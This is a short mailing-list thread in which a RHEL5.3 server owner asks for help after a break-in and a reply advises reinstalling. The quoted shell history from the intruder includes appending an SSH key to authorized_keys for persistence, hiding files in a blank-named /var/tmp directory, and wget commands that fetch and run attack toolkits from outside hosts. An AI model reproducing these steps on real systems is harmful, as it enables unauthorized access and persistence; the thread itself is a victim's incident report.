Yes you were hacked. Hope you have backups because you should reinstall. Sent from my iPhone On Jan 28, 2010, at 0:11, "Joy Methew" <ml4joy@xxxxxxxxx> wrote: > Hello all, > i m using RHEL5.3 as a my mail server with real > ip.i > configure my system mostly remotely.last login time of my system 27 > jan > from this ip 118.129.153.43. > than i try to login at 28 jan in morning so i can`t got > authentication as > root from my last password. > than i reboot the system reset my password. > i login as a root than i run "last" command i m sending tha first 10 > lines > of last command...i thinks someone hack my system.i am sending history > command output. > now i remove .ssh directory and /var/tmp/* > > please suggest wat is this?? > > thanks > > last command out put: > root pts/1 117.199.118.234 Thu Jan 28 10:58 still > logged in > root pts/0 117.199.118.234 Thu Jan 28 10:49 still > logged in > root tty1 Thu Jan 28 10:48 - 10:52 > (00:04) > reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 > (00:25) > root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 > (00:09) > root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 > (02:25) > root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 > (00:00) > root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 > (00:00) > root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 > (00:01) > root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 > (00:03) > > What is 165.red-79........this is nt my ip. > > > History Output > > 115 cat /proc/cpuinfo > 116 mkdir .ssh > 117 cd .ssh > 118 echo ssh-rsa > AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH > +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ > +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf > +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== > rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod > 600 > ~/.ssh/authorized_keys > 119 cd /var/tmp > 120 mkdir " " > 121 cd " " > 122 passwd > 123 echo ssh-rsa > AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH > +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ > +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf > +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== > rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod > 600 > ~/.ssh/authorized_keys > 124 ps -x > 125 cd /var/tmp > 126 w > 127 wget http://kok.ucoz.de/gosh.tgz > 128 tar xvf gosh.tgz > 129 cd gosh > 130 chmod +x * > 131 ./go.sh 121 > 132 w > 133 ps -x > 134 ps -aux > 135 cd /var/tmp > 136 cd " " > 137 ls -a > 138 wget http://helpbnc.myftp.org/danger/fld.tgz > 139 tar xzvf fld.tgz > 140 cd fld > 141 chmod +x * > 142 nano cyc.acc > 143 nano cyc.acc.1 > 144 nano cyc.set > 145 ./httpd > 146 w > -- > redhat-list mailing list > unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe > https://www.redhat.com/mailman/listinfo/redhat-list -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
